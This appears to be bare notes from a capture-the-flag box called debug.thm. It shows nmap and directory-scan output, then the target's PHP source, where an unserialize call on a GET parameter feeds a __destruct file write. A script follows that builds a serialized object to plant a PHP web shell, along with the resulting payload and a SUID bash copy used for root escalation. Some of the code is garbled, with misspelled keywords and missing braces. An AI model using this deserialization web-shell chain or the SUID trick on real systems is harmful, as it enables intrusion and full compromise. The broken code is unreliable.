
nmap --min-rate=10000 -p- debug.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-27 11:24 UTC
Nmap scan report for debug.thm (
Host is up (0.0060s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp open ssh
80/tcp open http
MAC Address: 02:39:10:22:A6:7F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.45 seconds
nmap -sC -sT -sV -O -p22,80 debug.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-27 11:25 UTC
Nmap scan report for debug.thm (
Host is up (0.00040s latency).

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 44ee1eba072a5469ff11e349d7dba901 (RSA)
| 256 8b2a8fd8409533d5fa7a406a7f29e403 (ECDSA)
|_ 256 6559e4402ac2d70577b3af60dacdfc67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:39:10:22:A6:7F (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (99%), Linux 3.8 (96%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Linux 3.10 (92%), Linux 3.12 (92%), Linux 3.19 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.42 seconds



feroxbuster -u http://debug.thm/  -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,zip,txt,sql,bak,db,rar  

class FormSubmit {

public $form_file = 'message.txt';
public $message = '';

ptublic funcion SaveMessage() {

$NameArea = $_GET['name'];
$EmailArea = $_GET['email'];
$TextArea = $_GET['comments'];

$this-> message = "Message From : " . $NameArea . " || From Email : " . $EmailArea . " || Comment : " . $TextArea . "\n";


public function __destruct() {

file_put_contents(__DIR__ . '/' . $this->form_file,$this->message,FILE_APPEND);
echo 'Your submission has been successfully saved!';



// Leaving this for now... only for debug purposes... do not touch!

$debug = $_GET['debug'] ?? '';
$messageDebug = unserialize($debug);

$application = new FormSubmit;
$application -> SaveMessage();





class FormSubmit {
public $form_file = 'shell.php';
public $message = '<?php system($_GET["shell"]);';

// 创建 FormSubmit 类的实例
$formSubmit = new FormSubmit();

// 序列化对象
$serializedObject = serialize($formSubmit);

// 输出序列化后的对象
echo $serializedObject;



O:10:"FormSubmit":2:{s:9:"form_file";s:9:"shell.php";s:7:"message";s:29:"<?php system($_GET["shell"]);";}






find /etc/ -type f -perm /u+w





cp /bin/bash /tmp/root_bash;chmod +xs /tmp/root_bash


/tmp/root_bash -p


